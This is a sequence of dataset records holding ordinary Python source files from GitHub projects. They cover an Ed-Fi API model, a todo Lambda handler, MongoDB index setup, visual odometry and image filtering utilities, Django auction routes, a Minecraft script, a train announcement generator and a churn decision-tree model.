noqa: E501\n :rtype: date\n \"\"\"\n return self._begin_date\n\n @begin_date.setter\n def begin_date(self, begin_date):\n \"\"\"Sets the begin_date of this EdFiAcademicWeek.\n\n The start date for the academic week. # noqa: E501\n\n :param begin_date: The begin_date of this EdFiAcademicWeek. # noqa: E501\n :type: date\n \"\"\"\n if self._configuration.client_side_validation and begin_date is None:\n raise ValueError(\"Invalid value for `begin_date`, must not be `None`\") # noqa: E501\n\n self._begin_date = begin_date\n\n @property\n def end_date(self):\n \"\"\"Gets the end_date of this EdFiAcademicWeek. # noqa: E501\n\n The end date for the academic week. # noqa: E501\n\n :return: The end_date of this EdFiAcademicWeek. # noqa: E501\n :rtype: date\n \"\"\"\n return self._end_date\n\n @end_date.setter\n def end_date(self, end_date):\n \"\"\"Sets the end_date of this EdFiAcademicWeek.\n\n The end date for the academic week. # noqa: E501\n\n :param end_date: The end_date of this EdFiAcademicWeek. # noqa: E501\n :type: date\n \"\"\"\n if self._configuration.client_side_validation and end_date is None:\n raise ValueError(\"Invalid value for `end_date`, must not be `None`\") # noqa: E501\n\n self._end_date = end_date\n\n @property\n def total_instructional_days(self):\n \"\"\"Gets the total_instructional_days of this EdFiAcademicWeek. # noqa: E501\n\n The total instructional days during the academic week. # noqa: E501\n\n :return: The total_instructional_days of this EdFiAcademicWeek. # noqa: E501\n :rtype: int\n \"\"\"\n return self._total_instructional_days\n\n @total_instructional_days.setter\n def total_instructional_days(self, total_instructional_days):\n \"\"\"Sets the total_instructional_days of this EdFiAcademicWeek.\n\n The total instructional days during the academic week. # noqa: E501\n\n :param total_instructional_days: The total_instructional_days of this EdFiAcademicWeek. 
# noqa: E501\n :type: int\n \"\"\"\n if self._configuration.client_side_validation and total_instructional_days is None:\n raise ValueError(\"Invalid value for `total_instructional_days`, must not be `None`\") # noqa: E501\n\n self._total_instructional_days = total_instructional_days\n\n @property\n def etag(self):\n \"\"\"Gets the etag of this EdFiAcademicWeek. # noqa: E501\n\n A unique system-generated value that identifies the version of the resource. # noqa: E501\n\n :return: The etag of this EdFiAcademicWeek. # noqa: E501\n :rtype: str\n \"\"\"\n return self._etag\n\n @etag.setter\n def etag(self, etag):\n \"\"\"Sets the etag of this EdFiAcademicWeek.\n\n A unique system-generated value that identifies the version of the resource. # noqa: E501\n\n :param etag: The etag of this EdFiAcademicWeek. # noqa: E501\n :type: str\n \"\"\"\n\n self._etag = etag\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(EdFiAcademicWeek, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, EdFiAcademicWeek):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, EdFiAcademicWeek):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"xmarcosx/edfi-notebook","sub_path":"src/v5.3/resources/swagger_client/models/ed_fi_academic_week.py","file_name":"ed_fi_academic_week.py","file_ext":"py","file_size_in_byte":10060,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"40829868506","text":"import json\nimport logging\nimport os\n# import time\n# import uuid\nimport boto3\n\n# from utils import decimalencoder\nfrom utils.todoTableClass import todoTableClass\n\n\nif os.environ[\"ENVIRONMENT\"] == \"LOCAL\":\n dynamodb = None\nelse:\n dynamodb = boto3.resource(\"dynamodb\")\n\n\n# Agrega un nuevo elemento a la lista\ndef create(event, context):\n data = json.loads(event['body'])\n\n if 'text' not in data:\n logging.error(\"Validation Failed\")\n raise Exception(\"Couldn't create the todo item.\")\n\n mytable = todoTableClass(dynamodb)\n item = mytable.put_todo(data['text'])\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(item)\n }\n return response\n","repo_name":"jruizcampos/todo-list-aws","sub_path":"src/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17691935898","text":"from typing import List, Optional\n\n# Must be imported in this way to allow for easy patching with mongomock\nimport pymongo\nfrom 
flask_pymongo import PyMongo\nfrom pydantic import BaseModel\nfrom pymongo.errors import ConnectionFailure\n\n__all__ = (\n \"flask_mongo\",\n \"check_mongo_connection\",\n \"create_default_indices\",\n \"_get_active_mongo_client\",\n \"insert_pydantic_model_fork_safe\",\n)\n\nflask_mongo = PyMongo()\n\"\"\"This is the primary database interface used by the Flask app.\"\"\"\n\n\ndef insert_pydantic_model_fork_safe(model: BaseModel, collection: str) -> str:\n \"\"\"Inserts a Pydantic model into chosen collection, returning the inserted ID.\"\"\"\n return (\n get_database()[collection]\n .insert_one(model.dict(by_alias=True, exclude_none=True))\n .inserted_id\n )\n\n\ndef _get_active_mongo_client(timeoutMS: int = 1000) -> pymongo.MongoClient:\n \"\"\"Returns a `MongoClient` for the configured `MONGO_URI`,\n raising a `RuntimeError` if not available.\n\n Parameters:\n timeoutMS: Value to use for the MongoDB timeouts (connect and server select)\n in milliseconds\n\n Returns:\n The active MongoClient, already connected.\n\n \"\"\"\n from pydatalab.config import CONFIG\n from pydatalab.logger import LOGGER\n\n try:\n return pymongo.MongoClient(\n CONFIG.MONGO_URI,\n connectTimeoutMS=timeoutMS,\n serverSelectionTimeoutMS=timeoutMS,\n connect=True,\n )\n except ConnectionFailure as exc:\n LOGGER.critical(f\"Unable to connect to MongoDB at {CONFIG.MONGO_URI}\")\n raise RuntimeError from exc\n\n\ndef get_database() -> pymongo.database.Database:\n \"\"\"Returns the configured database.\"\"\"\n return _get_active_mongo_client().get_database()\n\n\ndef check_mongo_connection() -> None:\n \"\"\"Checks that the configured MongoDB is available and returns a\n `pymongo.MongoClient` for the configured `MONGO_URI`.\n\n Raises:\n RuntimeError:\n If the configured MongoDB is not available.\n\n \"\"\"\n try:\n cli = _get_active_mongo_client()\n cli.list_database_names()\n except Exception as exc:\n raise RuntimeError from exc\n\n\ndef create_default_indices(\n client: Optional[pymongo.MongoClient] = None,\n background: bool = False,\n) -> List[str]:\n \"\"\"Creates indices for the configured or passed MongoClient.\n\n Indexes created are:\n - A text index over all string fields in item models,\n - An index over item type,\n - A unique index over `item_id` and `refcode`.\n - A text index over user names and identities.\n\n Parameters:\n background: If true, indexes will be created as background jobs.\n\n Returns:\n A list of messages returned by each `create_index` call.\n\n \"\"\"\n from pydatalab.logger import LOGGER\n from pydatalab.models import ITEM_MODELS\n\n if client is None:\n client = _get_active_mongo_client()\n db = client.get_database()\n\n item_fts_fields = set()\n for model in ITEM_MODELS:\n schema = ITEM_MODELS[model].schema()\n for f in schema[\"properties\"]:\n if schema[\"properties\"][f].get(\"type\") == \"string\":\n item_fts_fields.add(f)\n\n def create_or_recreate_text_index(collection, fields, weights):\n fts_index_name = f\"{collection.name} full-text search\"\n\n def create_fts():\n return collection.create_index(\n [(k, pymongo.TEXT) for k in fields],\n name=fts_index_name,\n weights=weights,\n )\n\n try:\n return create_fts()\n except pymongo.errors.OperationFailure:\n collection.drop_index(fts_index_name)\n return create_fts()\n\n ret = []\n\n ret += create_or_recreate_text_index(\n db.items,\n item_fts_fields,\n weights={\"refcode\": 3, \"item_id\": 3, \"name\": 3, \"chemform\": 3},\n )\n\n ret += create_or_recreate_text_index(\n db.collections,\n [\"collection_id\", \"title\", 
\"description\"],\n weights={\"collection_id\": 3, \"title\": 3, \"description\": 3},\n )\n\n ret += db.items.create_index(\"type\", name=\"item type\", background=background)\n ret += db.items.create_index(\n \"item_id\", unique=True, name=\"unique item ID\", background=background\n )\n ret += db.items.create_index(\n \"refcode\", unique=True, name=\"unique refcode\", background=background\n )\n ret += db.items.create_index(\"last_modified\", name=\"last modified\", background=background)\n\n user_fts_fields = {\"identities.name\", \"display_name\"}\n\n ret += db.users.create_index(\n [\n (\"identities.identifier\", pymongo.ASCENDING),\n (\"identities.identity_type\", pymongo.ASCENDING),\n ],\n unique=True,\n name=\"unique user identifiers\",\n background=background,\n )\n try:\n ret += db.users.create_index(\n [(k, pymongo.TEXT) for k in user_fts_fields],\n name=\"user identities full-text search\",\n background=background,\n )\n except Exception as exc:\n LOGGER.warning(\"Failed to create text index: %s\", exc)\n\n return ret\n","repo_name":"elbee99/datalab","sub_path":"pydatalab/pydatalab/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"16652689364","text":"import csv\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pyproj import Transformer\nfrom scipy.spatial.transform import Rotation as R\n\n\ndef dist(a, b):\n return np.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)\n\ndef nmea_to_srs(coordinate: tuple, transformer):\n coordinate_4326 = [int(x/100) + (x - int(x / 100) * 100) / 60 for x in coordinate]\n return np.array(transformer.transform(coordinate_4326[0], coordinate_4326[1]))\n \ndef get_scale_and_coord(filepath, img_offset, img_step):\n gnss_file = pd.read_csv(filepath)\n\n # GPS coordinates are transformed to 'EPSG:25832' to get distances in meters.\n srs_in = 'EPSG:4326'\n srs_out = 'EPSG:25832'\n transformer = Transformer.from_crs(srs_in, srs_out)\n\n timestamps = [row.time for _, row in gnss_file.iterrows()]\n coordinates = [nmea_to_srs((float(row.lat_nmea), float(row.lon_nmea)), transformer) for _, row in gnss_file.iterrows()]\n\n timestamps = timestamps[img_offset::img_step]\n coordinates = coordinates[img_offset::img_step]\n\n first_coord = coordinates[0]\n\n scales = []\n last_new_idx = 0\n velocity = 0\n for i, coord in enumerate(coordinates):\n if (coord[0] != coordinates[last_new_idx][0]).all():\n velocity = sum(abs(coord - coordinates[last_new_idx])) / (timestamps[i] - timestamps[last_new_idx])\n #velocity = np.linalg.norm((coord - coordinates[last_new_idx])) / (timestamps[i] - timestamps[last_new_idx])\n last_new_idx = i\n \n if i > 0:\n scales.append(velocity * (timestamps[i] - timestamps[i - 1])) \n return scales, first_coord\n\ndef get_orientations(imu_filepath, gnss_filepath):\n imu_file = pd.read_csv(imu_filepath)\n gnss_file = pd.read_csv(gnss_filepath)\n\n timestamps = [row.time for _, row in gnss_file.iterrows()]\n data = np.array([[row.time, -row.yaw_pitch_roll_0 + 123, row.yaw_pitch_roll_1, row.yaw_pitch_roll_2] for _, row in imu_file.iterrows()])\n yprs = []\n for time in timestamps:\n idx = np.argmin(abs(data[:,0] - time))\n yprs.append(data[idx,1:])\n\n orientations = [R.from_euler('yxz', ypr, degrees=True).as_matrix() for ypr in yprs]\n return orientations\n\ndef save_route_as_csv(route, filename, first_coord):\n x = [-pose[0, 3] for pose in route]\n z = [-pose[2, 3] for pose in route]\n if 
filename.split('.')[-1] != 'csv': filename = filename + '.csv'\n with open(filename, mode='w') as route_file:\n file_writer = csv.writer(route_file, delimiter=',')\n file_writer.writerow(['x','y'])\n for i in range(len(x)):\n file_writer.writerow([first_coord[0] + z[i], first_coord[1] + x[i]])\n\ndef save_2droute_as_csv(route, filename, first_coord):\n x = [-pose[0] for pose in route]\n z = [-pose[1] for pose in route]\n if filename.split('.')[-1] != 'csv': filename = filename + '.csv'\n with open(filename, mode='w') as route_file:\n file_writer = csv.writer(route_file, delimiter=',')\n file_writer.writerow(['x','y'])\n for i in range(len(x)):\n file_writer.writerow([first_coord[0] + z[i], first_coord[1] + x[i]])\n\n\ndef plot_route(poses, plot_type = 'scatter', projection = '2d', first_coord=[0, 0, 0]):\n fig = plt.figure()\n if projection == '3d':\n ax = fig.gca(projection=projection)\n else:\n ax = fig.gca()\n\n ax.set_xlabel('X')\n ax.set_ylabel('Z')\n ax.ticklabel_format(useOffset=False, style='plain')\n\n x = [-pose[0, 3] + first_coord[2] for pose in poses]\n y = [pose[1, 3] + first_coord[1] for pose in poses]\n z = [-pose[2, 3] + first_coord[0] for pose in poses]\n\n if projection == '3d':\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n ax.set_zlabel('Z')\n\n interval = max(max(x) - min(x), max(y) - min(y), max(z) - min(z))\n x_mean, y_mean, z_mean = np.mean(x), np.mean(y), np.mean(z)\n ax.set_xlim3d([x_mean - interval, x_mean + interval])\n ax.set_ylim3d([y_mean - interval, y_mean + interval])\n ax.set_zlim3d([z_mean - interval, z_mean + interval])\n \n if plot_type == 'quiver':\n orientations = [np.dot(np.array([0, 0, -1]), pose[:3,:3]) for pose in poses]\n x_rot = [rot[0] for rot in orientations]\n y_rot = [rot[1] for rot in orientations]\n z_rot = [rot[2] for rot in orientations]\n ax.quiver(x, y, z, x_rot, y_rot, z_rot, length=1, normalize=True)\n else:\n ax.scatter(x, y, z, marker='o')\n else:\n ax.set_xlabel('Z')\n ax.set_ylabel('X')\n ax.set_aspect(1)\n ax.scatter(z, x, marker='o')\n \n plt.show()\n","repo_name":"OliverVea/jayde16_olvea16_masters_products","sub_path":"VisualOdometry/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"17576803809","text":"'''\nAuthors\nLucas Yudi Sugi \t\t\t\tNumero USP: 9293251\nRicardo França Fernandes do Vale \t Numero USP: 9293477\n\nDiscipline\nSCC 0251 - Processamento de Imagens - 2018/1o sem - Prof. 
Moacir Ponti\n\nTitle\nApply the resize in an image\n'''\n\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport imageio\n\n#Size of mean filter applied in smoothing\nsizeMeanFilter = 3\n\n#Size of sobel filter applied in sharpening\nsizeSobelFilter = 3\n\n#Size of log filter applied in sharpening\nsizeLogFilter = 3\n\n#Sigma used in Log\nsigmaLog = 1.6\n\n#Parameter that is used in gamma adjustment\ngamma = 0.7\n\n#Parameter that us used in highBoost\nhighBoostParameter = 2\n\n'''\nImprove the enhancement of image and convert to grayscale using histogram equalizing\nimg: Image that we want to calculate\n'''\ndef histogramEqualizing(img):\n\n #Max pixel in image\n maxPixel = 256;\n \n #Creating the histogram for three channels\n histR = np.zeros(maxPixel,int)\n histG = np.zeros(maxPixel,int)\n histB = np.zeros(maxPixel,int)\n \n #Populating the channels\n for i in range(maxPixel):\n histR[i] = (img[:,:,0] == i).sum()\n histG[i] = (img[:,:,1] == i).sum()\n histB[i] = (img[:,:,2] == i).sum()\n \n #Accumulating pixels\n for i in range(1,maxPixel):\n histR[i] = histR[i] + histR[i-1]\n histG[i] = histG[i] + histG[i-1]\n histB[i] = histB[i] + histB[i-1]\n \n #Dimension of image\n M = img.shape[0]\n N = img.shape[1]\n \n #Multiplicative factor\n mulFactor = (maxPixel-1)/(M*N)\n \n #New image that is equalized\n newImg = np.zeros((M,N,3), dtype=np.uint8)\n \n #Apply the histogram equalizer\n for i in range(maxPixel):\n sR = int(histR[i] * mulFactor)\n sG = int(histG[i] * mulFactor)\n sB = int(histB[i] * mulFactor)\n\n newImg[np.where(img[:,:,0]==i)] = sR\n newImg[np.where(img[:,:,1]==i)] = sG\n newImg[np.where(img[:,:,2]==i)] = sB\n \n return newImg\n\n'''\nImprove the enhancement of image using gamma adjustment\nimg: Image that we want to enhancement\n'''\ndef gammaAdjustment(img):\n \n #Computhes the gamma adjustment\n img = np.power(img,gamma)\n\n #Normalizing and convert\n img = np.uint8(((img-img.max())/(img.max()-img.min()))*255)\n\n return img\n\n'''\nApply the convolution in an image\nimg: Image that it will be used for convolution\nmask: Matrix with the mask that will be used for convolution\n'''\ndef convolution(img,mask):\n \n #Extrac color channel\n imgR = img[:,:,0]\n imgG = img[:,:,1]\n imgB = img[:,:,2]\n\n #Image in frequency domain\n imgR = np.fft.fft2(imgR)\n imgG = np.fft.fft2(imgG)\n imgB = np.fft.fft2(imgB)\n \n #Filter in frequency domain\n mask = np.fft.fft2(mask)\n\n #Apply the convolution\n imgR = np.multiply(mask,imgR)\n imgG = np.multiply(mask,imgG)\n imgB = np.multiply(mask,imgB)\n \n #Get the real part\n imgR = np.real(np.fft.ifft2(imgR))\n imgG = np.real(np.fft.ifft2(imgG))\n imgB = np.real(np.fft.ifft2(imgB))\n\n #Normalizing\n imgR = np.uint8(((imgR-imgR.min())/(imgR.max()-imgR.min()))*255)\n imgG = np.uint8(((imgG-imgG.min())/(imgG.max()-imgG.min()))*255)\n imgB = np.uint8(((imgB-imgB.min())/(imgB.max()-imgB.min()))*255)\n \n #Image with result\n imgResult = np.zeros([img.shape[0],img.shape[1],3],dtype=np.uint8)\n imgResult[:,:,0] = imgR\n imgResult[:,:,1] = imgG\n imgResult[:,:,2] = imgB\n\n return imgResult\n\n'''\nSmoothing the image with mean filter\nimg: Image that will be smoothed\n'''\ndef smoothing(img):\n\n #Dimension of image\n M = img.shape[0]\n N = img.shape[1]\n\n #Creating mean filter\n meanFilter = np.zeros([M,N])\n for i in range(sizeMeanFilter):\n for j in range(sizeMeanFilter):\n meanFilter[i][j] = 1/(sizeMeanFilter*sizeMeanFilter)\n \n return convolution(img,meanFilter)\n\n'''\nApply the equation of log\nx: Coordinate 'x' that we use for 
calculate log\ny: Coordinate 'y' that we use for calculate log\n'''\ndef log(x,y):\n return (-1/(np.pi*np.power(sigmaLog,4))) * (1-((np.power(x,2)+np.power(y,2))/(2*np.power(sigmaLog,2))))* (np.exp((-np.power(x,2)-np.power(y,2))/(2*np.power(sigmaLog,2)))) \n\n'''\nSharpening with laplacian of gaussian\nimg: Image that we use to apply log\n'''\ndef laplacianOfGaussian(img):\n \n #Dimension of image\n M = img.shape[0]\n N = img.shape[1]\n \n #Create filter\n laplacianFilter = np.zeros([M,N])\n\n #Region that we want to populate (Calculates the limit's image)\n a = (sizeLogFilter-1/2)\n b = (sizeLogFilter-1/2)\n\n #Populating mask\n for i in range(sizeLogFilter):\n for j in range(sizeLogFilter):\n laplacianFilter[i][j] = log(i-a,j-b) \n\n return convolution(img,laplacianFilter)\n\n'''\nSharpening with high boost\nimg: Image that we use to apply high boost\n'''\ndef highBoost(img):\n\n #Blur image\n tempImage = np.copy(img)\n tempImage= smoothing(tempImage)\n \n #Create mask\n mask = img-tempImage\n\n return np.uint8(highBoostParameter*mask)\n\n'''\nSharpening with sobel operator\nimg: Image that we use to apply the sobel operator\n'''\ndef sobel(img): \n \n #Dimension of image\n M = img.shape[0]\n N = img.shape[1]\n \n #Create the two filters\n Fx = np.zeros([M,N]) \n Fx[0][0] = Fx[2][0] = 1\n Fx[1][0] = 2\n Fx[0][2] = Fx[2][2] = -1\n Fx[1][2] = -2\n Fy = np.zeros([M,N])\n Fy[0:3,0:3] = np.transpose(Fx[0:3,0:3])\n \n #Apply convolution\n Fx = convolution(img,Fx)\n Fy = convolution(img,Fy)\n\n #Convert\n Fx = np.float64(Fx)\n Fy = np.float64(Fy)\n \n return np.uint8(np.sqrt(np.power(Fx,2) + np.power(Fy,2)))\n","repo_name":"ricardoffv/Processamento-de-Imagens_Projeto-Final","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":5622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13435266363","text":"from django.urls import path\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"new_listing\", views.new_listing, name=\"new_listing\"),\n path(\"\", views.listing, name=\"listing\"),\n path(\"/watch\", views.watch, name=\"AddTo_watchlist\"),\n path(\"/unwatch\", views.unwatch, name=\"RemoveFrom_watchlist\"),\n path(\"myWatchlist\", views.myWatchlist, name=\"myWatchlist_url\"),\n path(\"/comment\", views.comment, name=\"addCommenturl\"),\n path(\"/bid\", views.bid, name=\"bidurl\"),\n path(\"/close\", views.closeAuction, name=\"closeurl\"),\n path(\"by_categories\", views.listings_by_categories, name=\"categoriesurl\"),\n path(\"by_categories/\", views.listings_by_category, name=\"categoryurl\"),\n path(\"won\", views.auctions_won, name=\"wonurl\"),\n]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n#below was coded for ImageField\n\n\n\n","repo_name":"robot180/commerce","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36868913616","text":"from mcpi.minecraft import Minecraft\nmc=Minecraft.create()\nimport time\nimport random\n\nx,y,z=mc.player.getPos()\n\n# pos=mc.player.getPos()\n# x,y,z=pos.x,pos.y,pos.z\n\ncount=0\nwhile count<5:\n \n x=x+random.randint(-2,2)\n y=y+random.randint(0,5)\n z=z+random.randint(-2,2)\n mc.postToChat(\"{},{},{}\".format(x,y,z))\n mc.player.setPos(x,y,z)\n print(count)\n count=count+1 \n time.sleep(1)\n ","repo_name":"newsteinking/workspace_backup","sub_path":"workspace_K/workspace_jihoon/python/python_minecraft/Learn to Program with Minecraft Code실습/chapter7-whileLoops/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22882314936","text":"import os\r\nimport pandas as pd \r\nfrom pydub import AudioSegment\r\nfrom gtts import gTTS\r\n\r\ndef textToSpeech(text,filename):\r\n mytext = str(text)\r\n language = 'hi'\r\n myobj = gTTS(text=mytext,lang=language,slow=False)\r\n myobj.save(filename)\r\n\r\n\r\ndef margeAudio(audios):\r\n combined = AudioSegment.empty()\r\n for audio in audios :\r\n combined += AudioSegment.from_mp3(audio)\r\n return combined\r\n\r\n \r\ndef generateSkeleton():\r\n '''generate krupaya dhyan dhejeya'''\r\n audio = AudioSegment.from_mp3('railway.mp3')\r\n\r\n # 1 generating Krypaya dhayan \r\n start = 19000\r\n finish = 23000\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"1_annon.mp3\",format=\"mp3\")\r\n # 2 from city\r\n\r\n # 3 ke rasthe\r\n start = 29250\r\n finish = 29900\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"3_annon.mp3\",format=\"mp3\")\r\n # 4 to city \r\n\r\n # 5 ko jana avli \r\n start = 30500\r\n finish = 31500\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"5_annon.mp3\",format=\"mp3\")\r\n # 6,7 train number and name\r\n \r\n # 8 apani nertharith sami\r\n start = 32000\r\n finish = 33000\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"8_annon.mp3\",format=\"mp3\") \r\n # 9 time\r\n \r\n # 10 platforn number per avage \r\n start = 37000\r\n finish = 38000\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"10_annon.mp3\",format=\"mp3\")\r\n\r\n \r\n # 11 platform 
\r\n\r\n # 12 per sa jayagi \r\n start = 38500\r\n finish = 40000\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"12_annon.mp3\",format=\"mp3\") \r\n\r\ndef generateAnnoun(filename):\r\n df = pd.read_excel(filename)\r\n print(df)\r\n for index,item in df.iterrows():\r\n # 2 from city generate\r\n textToSpeech(item['from'],'2_annon.mp3')\r\n\r\n # 4 to city generator\r\n textToSpeech(item['to'],'4_annon.mp3')\r\n\r\n # 6,7 train name and number\r\n textToSpeech(item['train_no'] ,'6_annon.mp3')\r\n textToSpeech(item['train_name'] ,'7_annon.mp3')\r\n\r\n # 9 time \r\n textToSpeech(item['time'],'9_annon.mp3')\r\n\r\n # 11 platform number\r\n textToSpeech(item['platform'],'11_annon.mp3')\r\n\r\n audio = [f\"{i}_annon.mp3\" for i in range(1,13)]\r\n\r\n anounouncement = margeAudio(audio)\r\n anounouncement.export(f\"announcement_{item['train_no']}_{index+1}.mp3\",format = \"mp3\")\r\n\r\nif __name__ == \"__main__\":\r\n print('Genrating Skeleton')\r\n generateSkeleton()\r\n print('Generating Announcemene')\r\n generateAnnoun('train_annon.xlsx')\r\n","repo_name":"jyothiprakashpanaik/indian-railway","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4377786193","text":"import pandas as pd #импорт библиотек, которые потребуются.\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeClassifier #импортируем модель деревьев решений\nfrom io import StringIO\nfrom IPython.display import Image\nfrom scipy.stats import randint as randint\nfrom scipy.stats import uniform\n\n\n# Для блакнота\n#%matplotlib inline\n\nplt.style.use('ggplot')\nplt.rcParams['figure.figsize'] = (18,12)\n\ndf_churn = pd.read_csv('churn.csv')\n\n\ndef preproc(df_init): # объявляем функцию\n df_preproc = df_init.copy()\n\n df_preproc = df_preproc.drop(['State', 'Area Code', 'Phone'], axis=1) # удаляем малоинформативные столбцы\n\n df_preproc.loc[:, [\"Int'l Plan\", 'VMail Plan']] = \\\n df_preproc.loc[:, [\"Int'l Plan\", 'VMail Plan']].replace(\n {'no': 0, 'yes': 1}) # делаем замену занчений в указанных столбцах\n # на 0 и 1\n df_preproc.loc[:, 'Churn?'] = df_preproc.loc[:, 'Churn?'].replace(\n {'False.': 0, # аналогично делаем замену и в столбце 'Churn?'\n 'True.': 1})\n return df_preproc\n\ndf_preproc = df_churn.pipe(preproc) # обрабоатываем датафрейм при помощи функции, описанной выше.\n\nX, y = df_preproc.iloc[:, :-1].values, df_preproc.iloc[:, -1].values # разделяем датафрейм на два множества:\n# данные для обучения и ответы.\n\ntry:\n from sklearn.model_selection import validation_curve\nexcept ImportError:\n from sklearn.learning_curve import validation_curve\n\ntry:\n from sklearn.model_selection import StratifiedKFold\nexcept ImportError:\n from sklearn.cross_validation import StratifiedKFold\n\nmodel = DecisionTreeClassifier(random_state=123) # инициализируем модель\n\ncv = StratifiedKFold(n_splits=5, shuffle=True, random_state=132) #разбиваем наше множество на 5 частей и перемешиваем \"shuffle=True\"\n\ntrain_scores, valid_scores = validation_curve(model, X, y, #задаем параметры для валидационной кривой.\n 'max_depth', range(1, 20), # будем исследовать глубину дерева в диапазоне от 1 до 20\n cv=cv, scoring='roc_auc')\n\ntrain_score_mean = train_scores.mean(axis=1)\ntrain_score_std = train_scores.std(axis=1)\nvalid_scores_mean = valid_scores.mean(axis=1)\nvalid_scores_std = 
valid_scores.std(axis=1)\n\nplt.fill_between(range(1,20), train_score_mean-train_score_std, train_score_mean+train_score_std, color='b',\n interpolate=True, alpha=0.5,)\nplt.fill_between(range(1,20), valid_scores_mean-valid_scores_std, valid_scores_mean+valid_scores_std, color='r',\n interpolate=True, alpha=0.5)\n\nplt.plot(range(1,20), train_score_mean, c='b', lw=2)\nplt.plot(range(1,20), valid_scores_mean, c='r', lw=2)\n\nplt.xlabel('max depth')\nplt.ylabel('ROC AUC')\n\n\n\ntry:\n from sklearn.model_selection import RandomizedSearchCV # импортирует случайный поиск\nexcept ImportError:\n from sklearn.cross_validation import RandomizedSearchCV\n\nRND_SEED = 123\n\nparam_grid = { #зададим параметры по которым и будем осуществлять поиск\n 'criterion': ['gini', 'entropy'],\n 'max_depth': randint(2, 8),\n 'min_samples_leaf': randint(5, 10),\n 'class_weight': [None, 'balanced']}\n\ncv = StratifiedKFold(n_splits=5, random_state=123, shuffle=True)\n\nmodel = DecisionTreeClassifier(random_state=123)\nrandom_search = RandomizedSearchCV(model, param_distributions=param_grid, n_iter=200, n_jobs=-1,\n cv=cv, scoring='roc_auc', random_state=123)\n\nrandom_search.fit(X, y)\nbest_model = random_search.best_estimator_;\nbest_model #параметры наилучшей модели\n\nmodel = random_search.best_estimator_\nimp = model.feature_importances_\n\npd.Series(index=df_preproc.columns[:-1], data = imp).sort_values()\n\nprint(random_search.best_params_)#выведем наилучшие параметры\nprint(random_search.best_score_)#лучшее значение метрики","repo_name":"rushan-nazmiev/machineLearning","sub_path":"DecisionTree/index_churn.py","file_name":"index_churn.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36970923796","text":"#! 
